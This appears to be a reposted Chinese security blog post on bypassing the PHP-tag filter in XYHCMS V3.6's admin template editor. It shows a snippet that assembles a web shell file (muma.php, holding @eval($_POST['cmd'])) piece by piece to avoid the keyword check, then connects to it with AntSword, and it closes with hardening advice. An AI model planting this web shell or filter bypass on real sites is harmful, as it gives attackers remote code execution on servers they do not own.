行云海CMS之模板编辑防不胜防

渗透技巧 2年前 (2022) admin
514 0 0

行云海CMS之模板编辑防不胜防



简介

行云海CMS(XYHCMS)是完全开源的一套CMS内容管理系统,行云海CMS(XYHCMS)分为两个分支。XYHCMS3.x为最新版(需要php5.3+);XYHCMS2.x为长期维护版(需要php5.2+)。

下载地址:http://www.xyhcms.com/down

版本:2022-06-17更新的V3.6版本

分析过程

下载安装本地 前台效果:

行云海CMS之模板编辑防不胜防


行云海CMS之模板编辑防不胜防

找了一下后台模板编辑,找一个容易测试的,首页页面,来修改模板。

行云海CMS之模板编辑防不胜防

定位到提交后的方法

行云海CMS之模板编辑防不胜防

源代码,在85行调用了检测php的一个函数

行云海CMS之模板编辑防不胜防

继续跟踪,找到调用的方法

行云海CMS之模板编辑防不胜防

首先的话,查找<?php ,<?= ,<? ,<script && php ,在字符串中存在然后执行正则表达式的匹配以及替换 那我们就用拼接法去掉这几个不就可以了么 那我们来试一试不让用些<?php?>,那就用{:}来输出。

$file=fopen("muma.php","w");//根目录创建muma.php文件
fwrite($file,'<');
fwrite($file,'?');
fwrite($file,'php');
fwrite($file,' @eval($_POST["cmd"]);');
fwrite($file,'?>');
}
通过避免那几个关键词,我们试一下,看看能不能保存成功。

行云海CMS之模板编辑防不胜防


可以保存成功,我们运行下首页看下,是否会生成文件。


行云海CMS之模板编辑防不胜防


看下根目录下是否存在创建的文件。


行云海CMS之模板编辑防不胜防


使用蚁剑链接。


行云海CMS之模板编辑防不胜防


至此分析结束。

总结

后台在线编辑模板,对维护者提供了方便,但是也埋下了隐患,为了安全,还是建议关闭在线编辑模板功能然后线下修改模板后上传!

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。

行云海CMS之模板编辑防不胜防

原文始发于微信公众号(Tide安全团队):行云海CMS之模板编辑防不胜防

版权声明:admin 发表于 2022年9月23日 下午5:04。
转载请注明:行云海CMS之模板编辑防不胜防 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...